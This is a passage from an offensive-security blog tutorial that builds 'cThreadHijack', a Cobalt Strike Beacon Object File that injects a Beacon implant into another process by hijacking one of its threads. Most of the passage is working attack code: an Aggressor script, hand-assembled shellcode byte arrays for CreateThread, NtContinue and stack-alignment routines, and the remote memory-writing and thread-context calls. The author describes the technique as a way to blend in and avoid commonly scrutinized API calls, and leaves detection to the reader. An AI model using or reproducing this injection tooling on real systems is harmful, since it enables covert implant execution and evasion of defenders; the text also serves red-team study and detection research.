  8. The custom CreateThread routine is actually executed by being called from another routine that will be wrapped into our final payload, which is a routine for a call to NtContinue. This is the second component of our custom shellcode. After the CreateThread routine is finished executing, it will perform a return back into the NtContinue routine. After the hijacked thread executes the CreateThread routine, the thread needs to be restored with the original CPU registers, flags, etc. it had before the thread hijack occurred. NtContinue will be talked about in the latter portions of this post, but for now just know that NtContinue, at a high level, is a function in ntdll.dll that accepts a pointer to a CONTEXT record and sets the calling thread to that context. Again, no code has been executed so far. The only thing that has changed is our large “final payload” has added another component to it, NtContinue.
  9. The CreateThread routine is first prepended with a stack alignment routine, which performs bitwise AND with the stack pointer, to ensure a 16-byte alignment. Some function calls fail if they are not 16-byte aligned, and this ensures when the shellcode performs a call to the CreateThread routine, it is first 16-byte aligned. malloc is then invoked to create one giant buffer that all of these “moving parts” are added to.
  10. Now that there is one contiguous buffer for the final payload, using VirtualAllocEx and WriteProcessMemory, again, the final payload, consisting of the three routines, is injected into the remote process.
  11. Lastly, the previously captured CONTEXT record is updated so its Rip member, the DWORD64 holding the value of the 64-bit instruction pointer, points to the address of our full payload.
  12. SetThreadContext is then called, which forces the target thread to be updated to point to the final payload, and ResumeThread is used to queue our shellcode execution, by resuming the hijacked thread.

Before moving on, there are two things I would like to call out. The first is the call to CreateThread. At first glance, this may seem like it is not a viable alternative to CreateRemoteThread directly. The benefit of the thread hijacking technique is that even though a thread is created, it is not created from a remote process, it is created locally. This does a few things, including avoiding the common API call chain of VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread and secondly, by blending in (a bit more) by calling CreateThread, which is a less scrutinized API call. There are other IOCs to detect this technique. However, I will leave that as an exercise to the reader :-).

Let’s move on and start with some code.

Visual Studio + Beacon Object File Intrinsics

For this project, I will be using Visual Studio and the MSVC Compiler, cl.exe. Feel free to use mingw, as it can also produce BOFs. Let’s go over a few house rules for BOFs before we begin.

In order to compile a BOF on Visual Studio, open an x64 Native Tools Command Prompt for VS session and use the following command: cl /c /GS- INPUT.c /FoOUTPUT.o. This will compile the C program as an object file only and will not implement stack cookies, due to the Cobalt Strike linker obviously not being able to locate the injected stack cookie check functions.

If you would like to call a Windows API function, BOFs require a __declspec(dllimport) keyword, which is defined in winnt.h as DECLSPEC_IMPORT. This indicates to the compiler that this function is found within a DLL, telling the compiler essentially “this function will be resolved later” and as mentioned before, since Cobalt Strike is the linker, this is needed to tell the compiler to let the linking come later. Since the linking will come later, this also means a full function prototype must be supplied to the BOF. You can use Visual Studio to “peek” the prototype of a Windows API function. This will suffice in attributing the __declspec(dllimport) keyword to our function prototypes, as the prototypes of most Windows API functions contain a #define directive with a definition of WINBASEAPI, or similar, which already contains a __declspec(dllimport) keyword. An example would be the prototype of the function GetProcAddress, as seen below.

This reveals the __declspec(dllimport) keyword will be present when this BOF is compiled.

Armed with this information, if an operator wanted to include the function GetProcAddress in their BOF, it would be outlined as such:

WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);

The value directly before the $ represents the library the function is found in. The relocation table of the object file, which essentially contains pointers to the list of items the object file needs addresses for, like functions from other libraries or object files, will point to the prototyped LIB$Function function's memory address. Cobalt Strike, acting as the linker and loader, will parse this table and update the relocation table of the object file, where applicable, with the actual addresses of the user-defined Windows API functions, such as GetProcAddress in the above test case. This blob is then passed to Beacon as code to be executed. Not reinventing the wheel here - Raphael outlines all of this in his wonderful video.

In addition to this, I will hit on one last thing - user-supplied arguments and returning output back to the operator. Beacon exposes an internal API to BOFs, which is outlined in the beacon.h header file supplied by Cobalt Strike. For returning output back to the operator, the API BeaconPrintf is exposed, which can send output over Beacon. This API accepts a user-supplied string, as well as a #define directive from beacon.h, namely CALLBACK_OUTPUT or CALLBACK_ERROR. For instance, updating the operator with a message would be implemented as such:

BeaconPrintf(CALLBACK_OUTPUT, "[+] Hello World!\n");

For accepting user supplied arguments, you’ll need to implement an Aggressor Script into your project. The following will be the script used for this post.

# Setup cThreadHijack
alias cThreadHijack {

    # Alias for Beacon ID and args
    local('$bid $listener $pid $payload');
    
    # Unpack the arguments
    ($bid, $pid, $listener) = @_;

    # Determine the amount of arguments
    if (size(@_) != 3)
    {
        berror($bid, "Error! Please enter a valid listener and PID");
        return;
    }

    # Read in the BOF
    $handle = openf(script_resource("cThreadHijack.o"));
    $data = readb($handle, -1);
    closef($handle);

    # Verify PID is an integer
    if ((!-isnumber $pid) || (int($pid) <= 0))
    {
        berror($bid, "Please enter a valid PID!\n");
        return;
    }

    # Generate a new payload 
    $payload = payload_local($bid, $listener, "x64", "thread");
    $handle1 = openf(">out.bin");
    writeb($handle1, $payload);
    closef($handle1);
    
    # Pack the arguments
    # 'b' is binary data and 'i' is an integer
    $args = bof_pack($bid, "ib", $pid, $payload);

    # Run the BOF
    # go = Entry point of the BOF
    beacon_inline_execute($bid, $data, "go", $args);
}

The goal is to be able to supply our BOF to Cobalt Strike, with the very original name cThreadHijack, a PID for injection, and the name of a Cobalt Strike listener. The first local statement sets up our variables, which include the ID of the Beacon executing the BOF, the listener name, the PID, and the payload, which will be generated later. The @_ statement sets an array with the order our arguments will be supplied to the BOF, meaning the command to use this BOF would be cThreadHijack PID "Name of listener". After, error checking is done to determine if 3 arguments have been supplied (two for the PID and listener; the Beacon ID, the third argument, is supplied without us needing to input anything). After the object file is read in and the PID is verified, the Aggressor function payload_local is used to generate a raw Cobalt Strike payload with the user-supplied listener name and a thread exit method. After this, the user-supplied $pid is packed as an integer and the newly created $payload variable is packed as binary data. Then, upon execution in Cobalt Strike, the alias cThreadHijack is executed with the aforementioned arguments, using the function go as the main entry point. This script must be loaded before executing the BOF.

From the C code side, this is how it looks to set these arguments and define the functions needed for thread hijacking.

The function BeaconDataParse is first used, with a special datap structure, to obtain the user-supplied arguments. Then, the int pid value is set to the user-supplied PID, while the char* shellcode value is set to the Beacon implant, meaning everything is in place. Finally, now that the details of adhering to BOF rules while writing C are out of the way, let's get into the code.

Open, Enumerate, Suspend, Get, Inject, and Get Out!

The first step in thread hijacking is to first open a handle to the target process. As mentioned before, calls that utilize this handle, VirtualAllocEx and WriteProcessMemory, must have a total access right of PROCESS_VM_OPERATION and PROCESS_VM_WRITE. This can be correlated to the following code.

This function accepts the user-supplied argument for a PID and returns a handle to it. After the process handle is opened, the BOF starts enumerating threads using the API CreateToolhelp32Snapshot. This routine is sent through a loop and “breaks” upon the first thread of the target PID being reached. When this happens, a call to OpenThread with the rights THREAD_SUSPEND_RESUME, THREAD_SET_CONTEXT, and THREAD_GET_CONTEXT occurs. This allows the program to suspend the thread, obtain the thread’s context, and set the thread’s context.

At this point, the goal is to suspend the identified thread, in order to obtain its current CONTEXT record and later set its context again.

Once the thread has been suspended, the Beacon implant is remotely injected into the target process. This will not be the final payload the hijacked thread will execute, this is simply to inject the Beacon implant into the remote process in order to use this address later on in the CreateThread routine.

Now that the remote thread is suspended and our Beacon implant shellcode is sitting within the remote process address space, it is time to implement a BYTE array that places the Beacon implant in a thread and executes it.

Beacon - Stay Put!

As previously mentioned, the first goal will be to place the already injected Beacon implant into its own thread. Currently, the implant is just sitting within the desired remote process and has not executed. To do this, we will create a 64-byte BYTE array that will contain the necessary opcodes to perform this task. Let’s take a look at the CreateThread function prototype.

HANDLE CreateThread(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);

As mentioned in the Microsoft documentation, this function creates a thread that executes within the virtual address space of the calling process. Since we will be injecting this routine into the remote process, when the routine is executed it will create a thread within that remote process. This is beneficial to us: because the routine runs inside the remote process, CreateThread spawns a local thread from that process's point of view, instead of requiring us to create a thread remotely from our current process.

The function parameter we care about is lpStartAddress, of type LPTHREAD_START_ROUTINE, which is really just a function pointer to whatever the thread will execute. In our case, this will be the address of our previously injected Beacon implant. We already have this address, as VirtualAllocEx has a return value of type LPVOID, which is a pointer to our shellcode. Let's get into the development of the routine.

The first step is to declare a BYTE array of 64 bytes. 64 was chosen because it is a multiple of a QWORD (a 64-bit value), meaning the routine occupies exactly 8 QWORDs, which keeps everything nicely aligned. Additionally, we will declare an integer variable to use as a “counter” in order to make sure we are placing our opcodes at the correct index within the BYTE array.

BYTE createThread[64] = { NULL };
int z = 0;

Since we are working on a 64-bit system, we must adhere to the __fastcall calling convention. This calling convention requires that the first four integer arguments be passed in the RCX, RDX, R8, and R9 registers, respectively (floating-point values are passed in different registers). However, a question remains - CreateThread has a total of six parameters, so what do we do with the last two? With __fastcall, the fifth and subsequent parameters are located on the stack, starting at an offset of 0x20 and every 0x8 bytes thereafter. This means, for our purposes, the fifth parameter will be located at RSP + 0x20 and the sixth will be located at RSP + 0x28. Here are the parameters used for our purposes.

  1. lpThreadAttributes will be set to NULL. Setting this value to NULL will ensure the thread handle isn’t inherited by child processes.
  2. dwStackSize will be set to 0. Setting this parameter to 0 forces the thread to inherit the default stack size for the executable, which is fine for our purposes.
  3. lpStartAddress, as previously mentioned, will be the address of our shellcode. This parameter is a function pointer to be executed by the thread.
  4. lpParameter will be set to NULL, as our thread does not need to inherit any variables.
  5. dwCreationFlags will be set to 0, which informs the system we would like the thread to run immediately after it is created. This will kick off our Beacon implant after thread creation.
  6. lpThreadId will be set to NULL, which is of less importance to us - as this will not return a thread ID to the LPDWORD pointer parameter. Essentially, we could have passed a legitimate pointer to a DWORD and it would have been dynamically filled with the thread ID. However, this is not important for purpose of this post.

The first step is to place a value of NULL, or 0, into the RCX register, for the lpThreadAttributes argument. To do this, we can use bitwise XOR.

// xor rcx, rcx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

This XORs RCX with itself; XORing a value with itself always results in 0, and the result is placed back in the RCX register. Synonymously, we can leverage the same property of XOR for the second parameter, dwStackSize, which is also 0.

// xor rdx, rdx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xd2;

The next step, is really the only parameter we need to specify a specific value for, which is lpStartAddress. Before supplying this parameter, let’s take a quick look back at our first injection, which planted the Beacon implant into the desired remote process.

The above code returns the virtual memory address of our allocation into the variable placeRemotely. As can be seen, this return value is of the data type LPVOID, while the lpStartAddress parameter takes a data type of LPTHREAD_START_ROUTINE, which is quite similar to LPVOID. However, for continuity's sake, we will first type cast this allocation into an LPTHREAD_START_ROUTINE function pointer.

// Casting shellcode address to LPTHREAD_START_ROUTINE function pointer
LPTHREAD_START_ROUTINE threadCast = (LPTHREAD_START_ROUTINE)placeRemotely;

In order to place this value into the BYTE array, we will need to use a function that can copy this address to the buffer, as the BYTE array will only accept one byte at a time. There is a limitation however, as BOFs do not link C-Runtime functions such as memcpy. We can overcome this by creating our own custom memcpy routine, or grabbing one from the MSVCRT library, which Cobalt Strike can link to us. However, for now and for awareness of others, we will leverage a libc.h header file that Raphael created, which can be found here.

Using the custom mycopy function, we can now perform a mov r8, LPTHREAD_START_ROUTINE instruction.

// mov r8, LPTHREAD_START_ROUTINE
createThread[z++] = 0x49;
createThread[z++] = 0xb8;
mycopy(createThread + z, &threadCast, sizeof(threadCast));
z += sizeof(threadCast);

Notice how the end of this small shellcode blob contains an update for the array index counter z, to ensure the array is written to at the correct index. We have the luxury of using mov r8, LPTHREAD_START_ROUTINE, as our shellcode has already been mapped into the remote process. This allows the CreateThread routine to find this function pointer in memory, as it is available within the remote process address space. We must remember that each process on Windows has its own private virtual address space, meaning memory in one user mode process isn't visible to another user mode process. As we will see with the NtContinue stub coming up, we will actually have to embed the preserved CONTEXT record of the hijacked thread into the payload itself, as the structure is located in the current process, while the code will be executing within the desired remote process.

Now that the lpStartAddress parameter has been completed, lpParameter must be set to NULL. Again, this can be done by utilizing bitwise XOR.

// xor r9, r9
createThread[z++] = 0x4d;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

The last two parameters, dwCreationFlags and lpThreadId, will be located at offsets of 0x20 and 0x28, respectively, from RSP. Since R9 already contains a value of 0, and since both parameters need a value of 0, we can use two mov instructions, as such.

// mov [rsp+20h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x20;

// mov [rsp+28h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x28;

A quick note - notice that the brackets surrounding each [rsp+OFFSET] operand indicate a memory operand: we are overwriting the memory that RSP plus the offset points to, not the register itself.

The next goal is to resolve the address of CreateThread. Even though we will be resolving this address within the BOF, meaning it will be resolved within the current process, not the desired remote process, the address of CreateThread will be the same across processes, although each user mode process is mapped its own view of kernel32.dll. To resolve this address, we will use the following routine, with BOF-style declarations in our code.

// Resolve the address of CreateThread
unsigned long long createthreadAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32"), "CreateThread");

// Error handling
if (createthreadAddress == NULL)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve CreateThread. Error: 0x%lx\n", KERNEL32$GetLastError());
}

The unsigned long long variable createthreadAddress will be filled with the address of CreateThread. unsigned long long is a 64-bit value, which is the size of a memory address on a 64-bit system. Although KERNEL32$GetProcAddress has a prototype with a return value of FARPROC, we need the address to actually be of the type unsigned long long, DWORD64, or similar, to allow us to properly copy this address into the routine with mycopy. The next goal is to move the address of CreateThread into RAX. After this, we will perform a call rax instruction, which will kick off the routine. This can be seen below.

// mov rax, CreateThread
createThread[z++] = 0x48;
createThread[z++] = 0xb8;
mycopy(createThread + z, &createthreadAddress, sizeof(createthreadAddress));
z += sizeof(createthreadAddress);

// call rax (call CreateThread)
createThread[z++] = 0xff;
createThread[z++] = 0xd0;

Additionally, we want to add a ret opcode. The way our full payload will be set up is as follows:

  1. A call to the stack alignment/CreateThread routine will be made first (the stack alignment routine will be covered in a later portion of this blog). When a call instruction is executed, it pushes a return address onto the stack. This is the address that ret will jump to in order to continue execution of the payload. When the stack alignment/CreateThread routine is called, it will push a return address onto the stack. This return address will actually be the address of the next instruction within the NtContinue routine.
  2. We want to end our stack alignment/CreateThread routine with a ret instruction. This ret will force execution back to the NtContinue routine. This will all be outlined when execution is examined inside of WinDbg.
  3. The call to the stack alignment/CreateThread routine is actually going to be a part of the NtContinue routine. The first instruction in the NtContinue routine will be a call to the stack alignment/CreateThread shellcode, which will then perform a ret back to the NtContinue routine, where thread execution will be restored. Here is a quick visual.

PAYLOAD = NtContinue shellcode calls stack alignment/CreateThread shellcode -> stack alignment/CreateThread shellcode executes, placing Beacon in its own local thread. This shellcode performs a return back to the NtContinue shellcode -> NtContinue shellcode finishes executing, which restores the thread

In accordance with our plan, let’s end the CreateThread routine with a 0xc3 opcode, which is a return instruction.

// Return to the caller in order to kick off NtContinue routine
createThread[z++] = 0xc3;

Let’s continue by developing a NtContinue shellcode routine. After that, we will develop a stack alignment shellcode in order to ensure the stack pointer is 16-byte aligned, when the first call occurs in our final payload. Once we have completed both of these routines, we will walk through the entire shellcode inside of the debugger.

“Never in the Field of Human Conflict, Was So Much Owed, by So Many, to NtContinue”

Up until now, we have achieved the following:

  1. Our shellcode has been injected into the remote process.
  2. We have identified a remote thread, which we will later manipulate to execute our Beacon implant.
  3. We have created a routine that will place the Beacon implant in its own local thread, within the remote process, upon execution.

This is great, and we are almost home free. The issue that remains, however, is the topic of thread restoration. After all, we are taking a thread which was performing some sort of action, unbeknownst to us, and forcing it to do something else. This will certainly result in execution of our shellcode, but it will also present some unintended consequences. Upon executing our shellcode, the thread’s CPU registers, along with other information, will be out of context from the actions it was performing before execution. This will most likely cause the process housing this thread, the desired remote process we are injecting into, to crash. To avoid this, we can utilize an undocumented ntdll.dll function, NtContinue. As pointed out in Alex Ionescu and Yarden Shafir’s R.I.P ROP: CET Internals in Windows 20H1 blog post, NtContinue is used to resume execution after an exception or interrupt. This is perfect for our use case, as we can abuse this functionality. Since our thread will be mangled, calling this function with the preserved CONTEXT record from earlier will restore execution properly. NtContinue accepts a pointer to a CONTEXT record, and a parameter that allows a programmer to set whether the alerted state should be removed from the thread, as outlined in its function prototype. We need not worry about the second parameter for our purposes, as we will set it to FALSE. However, there remains the issue of the first parameter, PCONTEXT.

As you can recall in the former portion of this blog post, we first preserved the CONTEXT record for our hijacked thread, within our BOF code. The issue we have, however, is that this CONTEXT record is sitting within the current process, while our shellcode will be executed within the desired remote process. Because of the fact each user mode process has its own private address space, this CONTEXT record’s address is not visible to the remote process we are injecting into. Additionally, since NtContinue does not accept a HANDLE parameter, it expects the thread it will resume execution for is the current calling thread, which will be in the remote process. This means we will need to embed the CONTEXT record into our final payload that will be injected into the remote process. Additionally, since NtContinue restores execution of the calling thread, this is why we need to embed an NtContinue shellcode into the final payload that will be placed into the remote process. That way, when the hijacked thread executes the NtContinue routine, restoration of the hijacked thread will occur, since it is the calling thread. With that said, let’s get into developing the routine.

Synonymous with our CreateThread routine, let’s create a 64-byte buffer and a new counter.

BYTE ntContinue[64] = { NULL };
int i = 0;

As mentioned earlier, this NtContinue routine is going to be the piece of code that actually invokes the CreateThread routine. When this NtContinue routine performs the call to the CreateThread routine, it will push a return address on the stack, which will be the next instruction within this NtContinue shellcode. When the CreateThread shellcode performs its return, execution will pick back up inside of the NtContinue shellcode. With this in mind, let’s start by using a near call, which uses relative addressing, to call the CreateThread shellcode.

The first goal is to start off the NtContinue routine with a call to the CreateThread routine. To do this, we first need to calculate the distance from this call instruction to the location of the CreateThread shellcode. In order to properly do this, we need to take one thing into consideration: we also need to carry the preserved CONTEXT record with us, for use in the NtContinue call. To do this, we will use a near call procedure. Near calls, in assembly, do not call an absolute address, like the address of a Windows API function, for instance. Instead, near call instructions can be used to call a function relative to the address in the instruction pointer. Essentially, if we can calculate the distance, in a DWORD, to the CreateThread routine, we can just invoke the opcode 0xe8, along with a DWORD to represent the distance from the current memory location, in order to dynamically call the CreateThread routine! The reason we are using a DWORD, which is a 32-bit value, is because the x86 instruction set, which is usable by 64-bit systems, allows either a 16-bit or 32-bit relative virtual address (RVA). However, this 32-bit value is sign extended to a 64-bit value on 64-bit systems. More information on the different calling mechanisms on x86_64 systems can be found here. The offset to our shellcode will be the size of our NtContinue routine plus the size of a CONTEXT record. This essentially will “jump over” the NtContinue code and the CONTEXT record, in order to first execute the CreateThread routine. The corresponding instructions we need are as follows.

// First calculate the size of a CONTEXT record and NtContinue routine
// Then, "jump over shellcode" by calling the buffer at an offset of the calculation (64 bytes + CONTEXT size)

// 0xe8 is a near call, which uses RIP as the base address for RVA calculations and dynamically adds the offset specified by shellcodeOffset
ntContinue[i++] = 0xe8;

// Subtracting to compensate for the near call opcode (represented by i) and the DWORD used for relative addressing
DWORD shellcodeOffset = sizeof(ntContinue) + sizeof(CONTEXT) - sizeof(DWORD) - i;
mycopy(ntContinue + i, &shellcodeOffset, sizeof(shellcodeOffset));

// Update counter with location buffer can be written to
i += sizeof(shellcodeOffset);

Although the above code practically represents what was said above, you can see that the size of a DWORD and the value of i are subtracted from the offset previously mentioned. This is because the whole NtContinue routine is 64 bytes. By the time the code has finished executing the entire call instruction, a few things will have happened. The first being, the call instruction itself, 0xe8, will have been executed. This takes us from being at the beginning of our routine, byte 1/64, to the second byte in our routine, byte 2/64. The CreateThread routine, which we need to call, is now one byte closer than when we started - and this will affect our calculations. In the above set of instructions, this byte has been compensated for by subtracting the already executed opcode (the current value of i). Additionally, four bytes are taken up by the actual offset itself, a DWORD, which is a 4-byte value. This means execution will now be at byte 5/64 (one byte for the opcode and four bytes for the DWORD). To compensate for this, the size of a DWORD has been subtracted from the total offset. If you think about it, this makes sense. By the time the call has finished executing, the CreateThread routine will be five bytes closer. If we used the original offset, we would have overshot the CreateThread routine by five bytes. Additionally, we update the i counter variable to let it know how many bytes we have written to the overall NtContinue routine. We will walk through all of these instructions inside of the debugger, once we have finished developing this small shellcode routine.
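To make the arithmetic concrete, here is a sketch using an assumed x64 CONTEXT size of 0x4d0 bytes (the real code simply uses sizeof(CONTEXT)):

```c
// Displacement for the near call, measured from the end of the call
// instruction. Assumptions: routineSize is the 64-byte ntContinue buffer,
// ctxSize stands in for sizeof(CONTEXT) (0x4d0 on x64), and i == 1 because
// only the 0xe8 opcode has been written at this point.
int near_call_offset(int routineSize, int ctxSize, int i)
{
    int dwordSize = 4; // the rel32 displacement itself occupies 4 bytes
    return routineSize + ctxSize - dwordSize - i;
}
```

With those numbers, the displacement is 64 + 0x4d0 - 4 - 1 = 1291 bytes; since the call instruction ends at offset 5, the target works out to offset 5 + 1291 = 0x510, the first byte after the CONTEXT record.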

At this point, the NtContinue routine would have called the CreateThread routine. The CreateThread routine would have returned execution back to the NtContinue routine, and the next instructions in the NtContinue routine would execute.

The next few instructions are a bit of a “hacky” method to pass the first parameter, a pointer to our CONTEXT record, to the NtContinue function. We will use a call/pop routine, which is a well-documented method and can be read about here and here. As we know, we are required to place the first value, for our purposes, into the RCX register - per the __fastcall calling convention. This means we need to calculate the address of the CONTEXT record somehow. To do this, we actually use another near call instruction in order to call the immediate byte after the call instruction.

// Near call instruction to call the address directly after, which is used to pop the pushed return address onto the stack with a RVA from the same page (call pushes return address onto the stack)
ntContinue[i++] = 0xe8;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;

The instruction this call will execute is the immediate next instruction to be executed, which will be a pop rcx instruction added by us. Additionally the value of i at this point is saved into a new variable called contextOffset.

// The previous call instruction pushes a return address onto the stack
// The return address will be the address, in memory, of the upcoming pop rcx instruction
// Since current execution is no longer at the beginning of the ntContinue routine, the distance to the CONTEXT record is no longer 64-bytes
// The address of the pop rcx instruction will be used as the base for RVA calculations to determine the distance between the value in RCX (which will be the address of the 'pop rcx' instruction) to the CONTEXT record
// Obtaining the current amount of bytes executed thus far
int contextOffset = i;

// __fastcall calling convention
// NtContinue requires a pointer to a context record and an alert state (FALSE in this case)
// pop rcx (get return address, which isn't needed for anything, into RCX for RVA calculations)
ntContinue[i++] = 0x59;

The purpose of this is that the call instruction will push the address of the pop rcx instruction onto the stack. This is the return address of this function. Since the next instruction directly after the call is pop rcx, it will place the value at RSP, which is now the address of the pop rcx instruction due to call POP_RCX_INSTRUCTION pushing it onto the stack, into the RCX register. This helps us, as now we have a memory address that is relatively close to the CONTEXT record, which will be located directly after the call to NtContinue.

Now, as we know, the original offset of the CONTEXT record from the very beginning of the entire NtContinue routine was 64 bytes. This is because we will copy the CONTEXT record directly after the 64-byte BYTE array, ntContinue, in our final buffer. Right now, however, if we add 64 bytes to the value in RCX, we will overshoot the CONTEXT record’s address. This is because we have executed quite a few instructions of the 64-byte shellcode, meaning we are now closer to the CONTEXT record than we were when we started. To compensate for this, we can add the original 64-byte offset to the RCX register, and then subtract the contextOffset value, which represents the total amount of opcodes executed up until that point. This will give us the correct distance from our current location to the CONTEXT record.

// The address of the pop rcx instruction is now in RCX
// Adding the distance between the CONTEXT record and the current address in RCX
// add rcx, distance to CONTEXT record
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xc1;

// Value to be added to RCX
// The distance between the value in RCX (address of the 'pop rcx' instruction) and the CONTEXT record can be found by subtracting the amount of bytes executed up until the 'pop rcx' instruction and the original 64-byte offset
ntContinue[i++] = sizeof(ntContinue) - contextOffset;

This will place the address of the CONTEXT record into the RCX register. If this doesn’t compute, don’t worry. In a brief moment, we will step through everything inside of WinDbg to visually put things together.
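Plugging in concrete numbers (an assumption based on the routine so far: two 5-byte near calls have executed before pop rcx, so contextOffset is 10):

```c
// Distance from the 'pop rcx' instruction to the CONTEXT record.
// The record sits immediately after the 64-byte routine, and the
// address in RCX is contextOffset bytes into that routine.
int context_distance(int routineSize, int contextOffset)
{
    return routineSize - contextOffset;
}
```

With routineSize = 64 and contextOffset = 10, the distance is 54 (0x36), the same immediate that shows up in the add rcx instruction during the WinDbg walkthrough.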

The next goal is to set the RaiseAlert function argument to FALSE, which is a value of 0. To do this, again, we will use bitwise XOR.

// xor rdx, rdx
// Set to FALSE
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x31;
ntContinue[i++] = 0xd2;

All that is left now is to call NtContinue! Again, just like our call to CreateThread, we can resolve the address of the API inside of the current process and pass the return value to the remote process, as even though each process is mapped its own Windows DLLs, the addresses are the same across the system.

The mov rax instruction set is first.

// Place NtContinue into RAX
ntContinue[i++] = 0x48;
ntContinue[i++] = 0xb8;

We then resolve the address of NtContinue, Beacon Object File style.

// Although the thread is in a remote process, the Windows DLLs mapped to the Beacon process, although private, will correlate to the same virtual address
unsigned long long ntcontinueAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll"), "NtContinue");

// Error handling. If NtContinue cannot be resolved, abort
if (ntcontinueAddress == NULL)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve NtContinue. Error: 0x%lx\n", KERNEL32$GetLastError());
}

Using the custom mycopy function, we then can copy the address of NtContinue at the correct index within the BYTE array, based on the value of i.

// Copy the address of NtContinue function address to the NtContinue routine buffer
mycopy(ntContinue + i, &ntcontinueAddress, sizeof(ntcontinueAddress));

// Update the counter with the correct offset the next bytes should be written to
i += sizeof(ntcontinueAddress);

At this point, things are as easy as just allocating some stack space for good measure and calling the value in RAX, NtContinue!

// Allocate some space on the stack for the call to NtContinue
// sub rsp, 0x20
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xec;
ntContinue[i++] = 0x20;

// call NtContinue
ntContinue[i++] = 0xff;
ntContinue[i++] = 0xd0;
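As a sanity check (a sketch that assumes the routine contains exactly the instructions shown above), we can total the bytes emitted and confirm the routine fits in the 64-byte buffer:

```c
// Byte counts for each instruction emitted into the ntContinue buffer.
int ntcontinue_routine_size(void)
{
    return 5    /* call over the CONTEXT record (0xe8 + rel32)  */
         + 5    /* call next instruction (the call/pop trick)   */
         + 1    /* pop rcx                                      */
         + 4    /* add rcx, imm8                                */
         + 3    /* xor rdx, rdx                                 */
         + 10   /* mov rax, imm64 (address of NtContinue)       */
         + 4    /* sub rsp, 0x20                                */
         + 2;   /* call rax                                     */
}
```

The total is 34 bytes, comfortably inside the 64-byte buffer; the remaining bytes simply stay zeroed and are never executed, since the call to NtContinue does not return here.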

All there is left now is the stack alignment routine inside of the call to CreateThread! This alignment is to ensure the stack pointer is 16-byte aligned when the call from the NtContinue routine invokes the CreateThread routine.

Will The Stars Align?

The following routine will perform bitwise AND with the stack pointer, to ensure a 16-byte aligned RSP value inside of the CreateThread routine, by clearing out the last 4 bits of the address.

// Create 4 byte buffer to perform bitwise AND with RSP to ensure 16-byte aligned stack for the call to shellcode
// and rsp, 0FFFFFFFFFFFFFFF0
stackAlignment[0] = 0x48;
stackAlignment[1] = 0x83;
stackAlignment[2] = 0xe4;
stackAlignment[3] = 0xf0;
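The effect of this instruction can be sketched in plain C; masking off the low 4 bits rounds any address down to the nearest 16-byte boundary:

```c
// Mirror of 'and rsp, 0FFFFFFFFFFFFFFF0': clear the low 4 bits,
// rounding the stack pointer down to a 16-byte boundary. Rounding
// down means the stack only ever grows, never shrinks, as a result.
unsigned long long align16(unsigned long long rsp)
{
    return rsp & 0xFFFFFFFFFFFFFFF0ULL;
}
```

An already-aligned pointer passes through unchanged, which is why the instruction turns out to be harmlessly redundant in the WinDbg walkthrough later on.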

After the stack alignment is completed, all there is left to do is invoke malloc to create a large buffer that will contain all of our custom routines, inject the final buffer, and call SetThreadContext and ResumeThread to queue execution!

// Allocating memory for final buffer
// Size of NtContinue routine, CONTEXT structure, stack alignment routine, and CreateThread routine
PVOID shellcodeFinal = (PVOID)MSVCRT$malloc(sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread));

// Copy NtContinue routine to final buffer
mycopy(shellcodeFinal, ntContinue, sizeof(ntContinue));

// Copying CONTEXT structure, stack alignment routine, and CreateThread routine to the final buffer
// Allocation is already a pointer (PVOID) - casting to a DWORD64 type, a 64-bit address, in order to write to the buffer at a desired offset
// Using RtlMoveMemory for the CONTEXT structure to avoid casting to something other than a CONTEXT structure
NTDLL$RtlMoveMemory((DWORD64)shellcodeFinal + sizeof(ntContinue), &cpuRegisters, sizeof(CONTEXT));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT), stackAlignment, sizeof(stackAlignment));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment), createThread, sizeof(createThread));

// Declare a variable to represent the final length
int finalLength = (int)sizeof(ntContinue) + (int)sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread);

Before moving on, notice the call to RtlMoveMemory when it comes to copying the CONTEXT record to the buffer. This is due to mycopy being prototyped to access the source and destination buffers as char* data types. However, RtlMoveMemory is prototyped to accept data types of VOID UNALIGNED, which indicates pretty much any data type can be used, which is perfect for us as CONTEXT is a structure, not a char*.

The above code creates a buffer sized to hold our routines and copies each piece into it at the correct offset, with the NtContinue routine copied first, followed by the preserved CONTEXT record of the hijacked thread, the stack alignment routine, and the CreateThread routine. After this, the shellcode is injected into the remote process.
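A sketch of the resulting layout, using a stand-in size for the CONTEXT record (0x4d0 bytes on x64; the real code uses sizeof(CONTEXT)) and malloc/memcpy in place of the BOF helpers:

```c
#include <stdlib.h>
#include <string.h>

#define NTC_SIZE   64      // ntContinue routine
#define CTX_SIZE   0x4d0   // stand-in for sizeof(CONTEXT) on x64 (assumption)
#define ALIGN_SIZE 4       // and rsp, imm8

// Assemble the four regions in order and report where the CreateThread
// routine lands via ctOffset. Caller frees the returned buffer.
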